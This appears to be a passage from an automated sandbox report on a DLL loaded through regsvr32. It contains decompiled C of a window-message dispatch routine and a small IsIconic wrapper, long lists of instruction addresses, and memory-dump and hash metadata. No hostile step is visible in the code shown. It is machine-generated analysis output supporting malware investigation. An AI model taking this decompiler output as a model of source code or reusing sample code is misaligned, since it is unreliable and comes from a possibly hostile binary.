												__eflags = _t196;
												if(_t196 == 0) {
													break;
												}
												__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x10)))) -  *(_t225 + 8);
												if( *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x10)))) ==  *(_t225 + 8)) {
													( *(_t225 - 0x18))[1] = _t196;
													E100128B8(_t225 - 0x14);
													L102:
													_t197 =  *((intOrPtr*)(_t196 + 0x14));
													L103:
													_push(_t224);
													_push( *((intOrPtr*)(_t225 + 0xc)));
													L104:
													_t159 =  *_t197();
													L105:
													 *((intOrPtr*)(_t225 - 0x10)) = _t159;
													goto L106;
												}
												_push(0);
												_push(0);
												_push(0xc000);
												_t198 = _t196 + 0x18;
												__eflags = _t198;
												_push(_t198);
											}
											_t195 =  *(_t225 + 0x10);
											L36:
											_t195 =  *_t195();
											 *(_t225 + 0x10) = _t195;
											continue;
										}
										_push( *(_t225 + 8));
										_push( *((intOrPtr*)(_t195 + 4)));
										_t166 = E10011C60();
										__eflags = _t166;
										 *(_t225 + 0x10) = _t166;
										if(_t166 == 0) {
											goto L36;
										}
										( *(_t225 - 0x18))[1] = _t166;
										E100128B8(_t225 - 0x14);
										L29:
										_t213 =  *((intOrPtr*)( *(_t225 + 0x10) + 0x10)) - 1;
										__eflags = _t213 - 0x44;
										if(__eflags > 0) {
											goto L106;
										}
										switch( *((intOrPtr*)(_t213 * 4 +  &M10016954))) {
											case 0:
												_push( *(__ebp + 0xc));
												_push(E1000CCCE(__ebx, __ecx, __edi, __esi, __eflags));
												goto L44;
											case 1:
												_push( *(__ebp + 0xc));
												goto L44;
											case 2:
												__eax = __esi;
												__eax = __esi >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = __si & 0x0000ffff;
												_push(__si & 0x0000ffff);
												__eax = E10013FEA(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
												goto L49;
											case 3:
												_push(__esi);
												__eax = E10013FEA(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
												goto L42;
											case 4:
												_push(__esi);
												L44:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L105;
											case 5:
												__ecx = __ebp - 0x28;
												E1000C4AC(__ebp - 0x28) =  *(__esi + 4);
												__ecx = __ebp - 0x7c;
												 *((char*)(__ebp - 4)) = 1;
												 *(__ebp - 0x24) =  *(__esi + 4);
												__eax = E100128F2(__ecx, __eflags);
												__eax =  *__esi;
												__esi =  *(__esi + 8);
												 *((char*)(__ebp - 4)) = 2;
												 *(__ebp - 0x5c) = __eax;
												__eax = E10014011(__ecx, __edi, __esi, __eflags, __eax);
												__eflags = __eax;
												if(__eflags == 0) {
													__eax =  *(__edi + 0x4c);
													__eflags = __eax;
													if(__eflags != 0) {
														__ecx = __eax + 0x24;
														__eax = E10021462(__eax + 0x24, __edi, __esi,  *(__ebp - 0x5c));
														__eflags = __eax;
														if(__eflags != 0) {
															 *(__ebp - 0x2c) = __eax;
														}
													}
													__eax = __ebp - 0x7c;
												}
												_push(__esi);
												_push(__eax);
												__eax = __ebp - 0x28;
												_push(__ebp - 0x28);
												__ecx = __edi;
												__eax =  *__ebx();
												 *(__ebp - 0x24) =  *(__ebp - 0x24) & 0x00000000;
												 *(__ebp - 0x5c) =  *(__ebp - 0x5c) & 0x00000000;
												__ecx = __ebp - 0x7c;
												 *(__ebp - 0x10) = __ebp - 0x28;
												 *((char*)(__ebp - 4)) = 1;
												__eax = E10014A18(__ebx, __ebp - 0x7c, __edi, __esi, __eflags);
												goto L59;
											case 6:
												__ecx = __ebp - 0x28;
												E1000C4AC(__ebp - 0x28) =  *(__esi + 4);
												_push( *(__esi + 8));
												 *(__ebp - 0x24) =  *(__esi + 4);
												__eax = __ebp - 0x28;
												_push(__ebp - 0x28);
												__ecx = __edi;
												 *((char*)(__ebp - 4)) = 3;
												__eax =  *__ebx();
												_t95 = __ebp - 0x24;
												 *_t95 =  *(__ebp - 0x24) & 0x00000000;
												__eflags =  *_t95;
												 *(__ebp - 0x10) = __ebp - 0x28;
												L59:
												__ecx = __ebp - 0x28;
												 *((char*)(__ebp - 4)) = 0;
												__eax = L1000CD56(__ecx);
												goto L106;
											case 7:
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = E10013FEA(__ebx, __ecx, __ebp, __esi);
												goto L61;
											case 8:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												goto L42;
											case 9:
												goto L103;
											case 0xa:
												_push(__esi);
												_push(E1001E527(__ebx, __ecx, __edi, __esi, __eflags));
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												L61:
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L49:
												_push(__eax);
												__ecx = __edi;
												__eax =  *__ebx();
												goto L105;
											case 0xb:
												_push(__esi);
												goto L87;
											case 0xc:
												_push( *(__ebp + 0xc));
												goto L90;
											case 0xd:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L106;
											case 0xe:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												goto L81;
											case 0xf:
												__esi = __esi >> 0x10;
												__eax = __ax;
												_push(__ax);
												__eax = __si;
												goto L81;
											case 0x10:
												_push(__esi >> 0x10);
												__eax = __si & 0x0000ffff;
												goto L95;
											case 0x11:
												_push(E10013FEA(__ebx, __ecx, __ebp, __esi));
												L87:
												_push( *(__ebp + 0xc));
												goto L88;
											case 0x12:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L105;
											case 0x13:
												_push(E10013FEA(__ebx, __ecx, __ebp,  *(__ebp + 0xc)));
												_push(E10013FEA(__ebx, __ecx, __ebp, __esi));
												__eax = 0;
												__eflags =  *((intOrPtr*)(__edi + 0x20)) - __esi;
												__eax = 0 |  *((intOrPtr*)(__edi + 0x20)) == __esi;
												goto L93;
											case 0x14:
												_push( *(__ebp + 0xc));
												__eax = E1000CCCE(__ebx, __ecx, __edi, __esi, __eflags);
												goto L76;
											case 0x15:
												_push( *(__ebp + 0xc));
												__eax = E1001E527(__ebx, __ecx, __edi, __esi, __eflags);
												goto L76;
											case 0x16:
												__esi = __esi >> 0x10;
												__eax = __ax;
												_push(__ax);
												__eax = __si;
												_push(__si);
												_push( *(__ebp + 0xc));
												__eax = E1001E527(__ebx, __ecx, __edi, __esi, __eflags);
												goto L93;
											case 0x17:
												_push( *(__ebp + 0xc));
												goto L75;
											case 0x18:
												_push(__esi);
												L75:
												__eax = E10013FEA(__ebx, __ecx, __ebp);
												L76:
												_push(__eax);
												goto L90;
											case 0x19:
												_push(__esi >> 0x10);
												__eax = __si & 0x0000ffff;
												goto L79;
											case 0x1a:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__ecx);
												L79:
												_push(__eax);
												__eax = E10013FEA(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
												goto L93;
											case 0x1b:
												_push(__esi);
												__eax = E10013FEA(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
												L81:
												_push(__eax);
												goto L88;
											case 0x1c:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax = E10013FEA(__ebx, __ecx, __ebp, __esi);
												goto L92;
											case 0x1d:
												__ecx =  *(__ebp + 0xc);
												__edx = __cx;
												__ecx =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax - 0x2a;
												__ecx = __cx;
												 *((intOrPtr*)(__ebp + 8)) = __edx;
												 *(__ebp + 0xc) = __ecx;
												if(__eax != 0x2a) {
													_push(__ecx);
													_push(__edx);
													L88:
													__ecx = __edi;
													__eax =  *__ebx();
													goto L106;
												}
												_push(E10013FEA(__ebx, __ecx, __ebp, __esi));
												_push( *(__ebp + 0xc));
												_push( *((intOrPtr*)(__ebp + 8)));
												goto L96;
											case 0x1e:
												_push(__esi);
												L90:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L106;
											case 0x1f:
												_push(__esi);
												_push( *(__ebp + 0xc));
												__ecx = __edi;
												__eax =  *__ebx();
												goto L2;
											case 0x20:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__ecx);
												L42:
												_push(__eax);
												goto L104;
											case 0x21:
												__eax =  *(__ebp + 0xc);
												_push(__esi);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												L92:
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L93:
												_push(__eax);
												goto L96;
											case 0x22:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__si);
												L95:
												_push(__eax);
												_push( *(__ebp + 0xc));
												L96:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L106;
											case 0x23:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												_push(__si);
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												_push( *(__ebp + 0xc) & 0x0000ffff);
												__ecx = __edi;
												__eax =  *__ebx();
												 *(__ebp - 0x10) =  *(__ebp + 0xc) & 0x0000ffff;
												L6:
												__eflags = _t185;
												if(_t185 != 0) {
													goto L106;
												}
												goto L39;
											case 0x24:
												goto L106;
											case 0x25:
												__ecx = __edi;
												__eax =  *__ebx();
												__eflags = __eax;
												 *(__ebp - 0x10) = __eax;
												if(__eax == 0) {
													goto L106;
												}
												L39:
												 *(_t225 - 4) =  *(_t225 - 4) | 0xffffffff;
												E100128B8(_t225 - 0x14);
												_t163 = 0;
												__eflags = 0;
												goto L40;
										}
									}
									_t170 =  *(_t225 - 0x18);
									_t58 =  &(_t170[1]);
									 *_t58 = _t170[1] & 0x00000000;
									__eflags =  *_t58;
									E100128B8(_t225 - 0x14);
									goto L39;
								}
								_t173 = _t194;
								__eflags =  *(_t225 + 0x10) - _t173[2];
								if( *(_t225 + 0x10) != _t173[2]) {
									goto L25;
								}
								_t196 = _t173[1];
								 *(_t225 + 0x10) = _t196;
								E100128B8(_t225 - 0x14);
								__eflags = _t196;
								if(_t196 == 0) {
									goto L39;
								}
								__eflags =  *(_t225 + 8) - 0xc000;
								if( *(_t225 + 8) < 0xc000) {
									goto L29;
								}
								goto L102;
							}
							__eflags =  *(_t147 + 0x74);
							if( *(_t147 + 0x74) <= 0) {
								goto L20;
							}
							__eflags = _t189 - 0x200;
							if(_t189 < 0x200) {
								L16:
								__eflags = _t189 - 0x100;
								if(_t189 < 0x100) {
									L18:
									__eflags = _t189 - 0x281 - 0x10;
									if(_t189 - 0x281 > 0x10) {
										goto L20;
									}
									L19:
									_t177 =  *((intOrPtr*)( *( *(_t222 + 0x4c)) + 0x94))(_t189,  *((intOrPtr*)(_t225 + 0xc)), _t224, _t225 - 0x10);
									__eflags = _t177;
									if(_t177 != 0) {
										goto L106;
									}
									goto L20;
								}
								__eflags = _t189 - 0x10f;
								if(_t189 <= 0x10f) {
									goto L19;
								}
								goto L18;
							}
							__eflags = _t189 - 0x209;
							if(_t189 <= 0x209) {
								goto L19;
							}
							goto L16;
						} else {
							_t181 = E10015E81(_t189, _t222, _t222, _t224, _t224 >> 0x10);
							__eflags = _t181;
							if(_t181 != 0) {
								L2:
								 *((intOrPtr*)(_t225 - 0x10)) = 1;
								L106:
								_t160 =  *((intOrPtr*)(_t225 + 0x14));
								if(_t160 != 0) {
									 *_t160 =  *((intOrPtr*)(_t225 - 0x10));
								}
								 *(_t225 - 4) =  *(_t225 - 4) | 0xffffffff;
								E100128B8(_t225 - 0x14);
								_t163 = 1;
								L40:
								return E10047725(_t163);
							}
							goto L12;
						}
					}
					_t217 =  *(_t225 + 0x10);
					__eflags =  *_t217;
					if( *_t217 == 0) {
						goto L39;
					}
					_push(_t225 - 0x10);
					_push(_t217);
					_push( *((intOrPtr*)(_t225 + 0xc)));
					_t185 =  *((intOrPtr*)( *__ecx + 0xec))();
					goto L6;
				}
				_push( *(_t225 + 0x10));
				_push( *((intOrPtr*)(_t225 + 0xc)));
				if( *((intOrPtr*)( *__ecx + 0xe8))() == 0) {
					goto L39;
				}
				goto L2;
			}

























                                                                                                                0x1001643c
                                                                                                                0x1001643c
                                                                                                                0x10016443
                                                                                                                0x10016448
                                                                                                                0x1001644c
                                                                                                                0x1001644f
                                                                                                                0x10016456
                                                                                                                0x1001645f
                                                                                                                0x10016462
                                                                                                                0x10016486
                                                                                                                0x10016489
                                                                                                                0x100164b5
                                                                                                                0x100164b8
                                                                                                                0x100164bb
                                                                                                                0x100164c8
                                                                                                                0x100164c8
                                                                                                                0x100164cd
                                                                                                                0x100164d0
                                                                                                                0x100164e6
                                                                                                                0x100164e6
                                                                                                                0x100164e9
                                                                                                                0x100164eb
                                                                                                                0x1001653a
                                                                                                                0x1001653e
                                                                                                                0x1001654b
                                                                                                                0x10016554
                                                                                                                0x1001655f
                                                                                                                0x10016565
                                                                                                                0x10016567
                                                                                                                0x1001656a
                                                                                                                0x1001659a
                                                                                                                0x1001659a
                                                                                                                0x1001659d
                                                                                                                0x100165a3
                                                                                                                0x100165a5
                                                                                                                0x10016634
                                                                                                                0x10016634
                                                                                                                0x10016637
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100165ad
                                                                                                                0x100165b4
                                                                                                                0x100165b6
                                                                                                                0x100165b8
                                                                                                                0x100165fc
                                                                                                                0x10016601
                                                                                                                0x1001661f
                                                                                                                0x10016624
                                                                                                                0x10016626
                                                                                                                0x10016628
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001660a
                                                                                                                0x1001660c
                                                                                                                0x1001691d
                                                                                                                0x10016920
                                                                                                                0x10016925
                                                                                                                0x10016925
                                                                                                                0x10016928
                                                                                                                0x10016928
                                                                                                                0x10016929
                                                                                                                0x1001692c
                                                                                                                0x1001692e
                                                                                                                0x10016930
                                                                                                                0x10016930
                                                                                                                0x00000000
                                                                                                                0x10016930
                                                                                                                0x10016612
                                                                                                                0x10016614
                                                                                                                0x10016616
                                                                                                                0x1001661b
                                                                                                                0x1001661b
                                                                                                                0x1001661e
                                                                                                                0x1001661e
                                                                                                                0x1001662a
                                                                                                                0x1001662d
                                                                                                                0x1001662f
                                                                                                                0x10016631
                                                                                                                0x00000000
                                                                                                                0x10016631
                                                                                                                0x100165ba
                                                                                                                0x100165bd
                                                                                                                0x100165c0
                                                                                                                0x100165c5
                                                                                                                0x100165c7
                                                                                                                0x100165ca
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100165cf
                                                                                                                0x100165d5
                                                                                                                0x100165da
                                                                                                                0x100165e3
                                                                                                                0x100165e6
                                                                                                                0x100165e9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100165ef
                                                                                                                0x00000000
                                                                                                                0x10016672
                                                                                                                0x1001667a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016684
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001669e
                                                                                                                0x100166a0
                                                                                                                0x100166a0
                                                                                                                0x100166a3
                                                                                                                0x100166a4
                                                                                                                0x100166a7
                                                                                                                0x100166ab
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100166ba
                                                                                                                0x100166be
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100166c5
                                                                                                                0x1001667b
                                                                                                                0x1001667b
                                                                                                                0x1001667d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100166c8
                                                                                                                0x100166d0
                                                                                                                0x100166d3
                                                                                                                0x100166d6
                                                                                                                0x100166da
                                                                                                                0x100166dd
                                                                                                                0x100166e2
                                                                                                                0x100166e4
                                                                                                                0x100166e8
                                                                                                                0x100166ec
                                                                                                                0x100166ef
                                                                                                                0x100166f4
                                                                                                                0x100166f6
                                                                                                                0x100166f8
                                                                                                                0x100166fb
                                                                                                                0x100166fd
                                                                                                                0x10016702
                                                                                                                0x10016705
                                                                                                                0x1001670a
                                                                                                                0x1001670c
                                                                                                                0x1001670e
                                                                                                                0x1001670e
                                                                                                                0x1001670c
                                                                                                                0x10016711
                                                                                                                0x10016711
                                                                                                                0x10016714
                                                                                                                0x10016715
                                                                                                                0x10016716
                                                                                                                0x10016719
                                                                                                                0x1001671a
                                                                                                                0x1001671c
                                                                                                                0x1001671e
                                                                                                                0x10016722
                                                                                                                0x10016726
                                                                                                                0x10016729
                                                                                                                0x1001672c
                                                                                                                0x10016730
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016737
                                                                                                                0x1001673f
                                                                                                                0x10016742
                                                                                                                0x10016745
                                                                                                                0x10016748
                                                                                                                0x1001674b
                                                                                                                0x1001674c
                                                                                                                0x1001674e
                                                                                                                0x10016752
                                                                                                                0x10016754
                                                                                                                0x10016754
                                                                                                                0x10016754
                                                                                                                0x10016758
                                                                                                                0x1001675b
                                                                                                                0x1001675b
                                                                                                                0x1001675e
                                                                                                                0x10016762
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001676c
                                                                                                                0x1001676f
                                                                                                                0x1001676f
                                                                                                                0x10016772
                                                                                                                0x10016774
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016786
                                                                                                                0x10016789
                                                                                                                0x1001678a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016793
                                                                                                                0x10016799
                                                                                                                0x1001679a
                                                                                                                0x1001679d
                                                                                                                0x10016779
                                                                                                                0x10016779
                                                                                                                0x1001677a
                                                                                                                0x100166b0
                                                                                                                0x100166b0
                                                                                                                0x100166b1
                                                                                                                0x100166b3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100168a0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100167ab
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100167a2
                                                                                                                0x100167a4
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100167b6
                                                                                                                0x100167b9
                                                                                                                0x100167ba
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100167c5
                                                                                                                0x100167c8
                                                                                                                0x100167cb
                                                                                                                0x100167cc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100167d9
                                                                                                                0x100167da
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016698
                                                                                                                0x100168a1
                                                                                                                0x100168a1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016689
                                                                                                                0x1001668b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100167ea
                                                                                                                0x100167f1
                                                                                                                0x100167f2
                                                                                                                0x100167f4
                                                                                                                0x100167f7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100167ff
                                                                                                                0x10016802
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016809
                                                                                                                0x1001680c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016815
                                                                                                                0x10016818
                                                                                                                0x1001681b
                                                                                                                0x1001681c
                                                                                                                0x1001681f
                                                                                                                0x10016820
                                                                                                                0x10016823
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001682d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016832
                                                                                                                0x10016833
                                                                                                                0x10016833
                                                                                                                0x10016838
                                                                                                                0x10016838
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016840
                                                                                                                0x10016841
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016846
                                                                                                                0x10016849
                                                                                                                0x1001684c
                                                                                                                0x1001684f
                                                                                                                0x10016850
                                                                                                                0x10016850
                                                                                                                0x10016854
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001685b
                                                                                                                0x1001685f
                                                                                                                0x10016864
                                                                                                                0x10016864
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001686a
                                                                                                                0x1001686d
                                                                                                                0x1001686f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016876
                                                                                                                0x10016879
                                                                                                                0x1001687c
                                                                                                                0x1001687f
                                                                                                                0x10016882
                                                                                                                0x10016885
                                                                                                                0x10016888
                                                                                                                0x1001688b
                                                                                                                0x1001689c
                                                                                                                0x1001689d
                                                                                                                0x100168a4
                                                                                                                0x100168a4
                                                                                                                0x100168a6
                                                                                                                0x00000000
                                                                                                                0x100168a6
                                                                                                                0x10016893
                                                                                                                0x10016894
                                                                                                                0x10016897
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100168ad
                                                                                                                0x100168ae
                                                                                                                0x100168ae
                                                                                                                0x100168b0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100168d7
                                                                                                                0x100168d8
                                                                                                                0x100168db
                                                                                                                0x100168dd
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016662
                                                                                                                0x10016665
                                                                                                                0x10016668
                                                                                                                0x1001666b
                                                                                                                0x1001666c
                                                                                                                0x1001666c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100168b4
                                                                                                                0x100168b7
                                                                                                                0x100168b8
                                                                                                                0x100168b8
                                                                                                                0x100168bb
                                                                                                                0x100168bb
                                                                                                                0x100168bc
                                                                                                                0x100168c0
                                                                                                                0x100168c0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100168c3
                                                                                                                0x100168c6
                                                                                                                0x100168c9
                                                                                                                0x100168cc
                                                                                                                0x100168cd
                                                                                                                0x100168cd
                                                                                                                0x100168ce
                                                                                                                0x100168d1
                                                                                                                0x100168d1
                                                                                                                0x100168d3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100168e4
                                                                                                                0x100168e7
                                                                                                                0x100168ea
                                                                                                                0x100168ed
                                                                                                                0x100168ee
                                                                                                                0x100168f2
                                                                                                                0x100168f5
                                                                                                                0x100168f6
                                                                                                                0x100168fa
                                                                                                                0x100168fb
                                                                                                                0x100168fd
                                                                                                                0x100168ff
                                                                                                                0x100164a8
                                                                                                                0x100164a8
                                                                                                                0x100164aa
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016907
                                                                                                                0x10016909
                                                                                                                0x1001690b
                                                                                                                0x1001690d
                                                                                                                0x10016910
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001664c
                                                                                                                0x1001664c
                                                                                                                0x10016653
                                                                                                                0x10016658
                                                                                                                0x10016658
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100165ef
                                                                                                                0x1001663d
                                                                                                                0x10016640
                                                                                                                0x10016640
                                                                                                                0x10016640
                                                                                                                0x10016647
                                                                                                                0x00000000
                                                                                                                0x10016647
                                                                                                                0x1001656f
                                                                                                                0x10016571
                                                                                                                0x10016574
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016576
                                                                                                                0x1001657c
                                                                                                                0x1001657f
                                                                                                                0x10016584
                                                                                                                0x10016586
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001658c
                                                                                                                0x10016593
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016595
                                                                                                                0x100164ed
                                                                                                                0x100164f1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100164f3
                                                                                                                0x100164f9
                                                                                                                0x10016503
                                                                                                                0x10016503
                                                                                                                0x10016509
                                                                                                                0x10016513
                                                                                                                0x10016519
                                                                                                                0x1001651c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001651e
                                                                                                                0x1001652c
                                                                                                                0x10016532
                                                                                                                0x10016534
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016534
                                                                                                                0x1001650b
                                                                                                                0x10016511
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10016511
                                                                                                                0x100164fb
                                                                                                                0x10016501
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100164d2
                                                                                                                0x100164dd
                                                                                                                0x100164e2
                                                                                                                0x100164e4
                                                                                                                0x1001647a
                                                                                                                0x1001647a
                                                                                                                0x10016933
                                                                                                                0x10016933
                                                                                                                0x10016938
                                                                                                                0x1001693d
                                                                                                                0x1001693d
                                                                                                                0x1001693f
                                                                                                                0x10016946
                                                                                                                0x1001694d
                                                                                                                0x1001665a
                                                                                                                0x1001665f
                                                                                                                0x1001665f
                                                                                                                0x00000000
                                                                                                                0x100164e4
                                                                                                                0x100164d0
                                                                                                                0x1001648b
                                                                                                                0x1001648e
                                                                                                                0x10016490
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001649b
                                                                                                                0x1001649c
                                                                                                                0x1001649d
                                                                                                                0x100164a2
                                                                                                                0x00000000
                                                                                                                0x100164a2
                                                                                                                0x10016464
                                                                                                                0x10016469
                                                                                                                0x10016474
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3
                                                                                                                • String ID:
                                                                                                                • API String ID: 431132790-0
                                                                                                                • Opcode ID: 34f6f1689c6f1fe59412e6c3379c9def9c694dafd6070cd8b35c4354a0752127
                                                                                                                • Instruction ID: 6f60986b119c3be40768c945038ae1be506edf061b984a87b6ee2efb94c889f8
                                                                                                                • Opcode Fuzzy Hash: 34f6f1689c6f1fe59412e6c3379c9def9c694dafd6070cd8b35c4354a0752127
                                                                                                                • Instruction Fuzzy Hash: 30F15A74A0025AEFDF14DF64CC90AAE7BA9FF08354F118129F815AF291DB35E981DB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100014C4 Relevance: 1.5, APIs: 1, Instructions: 4windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E100014C4(void* __ecx) {

				return IsIconic( *(__ecx + 0x20));
			}



                                                                                                                0x100031a2

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Iconic
                                                                                                                • String ID:
                                                                                                                • API String ID: 110040809-0
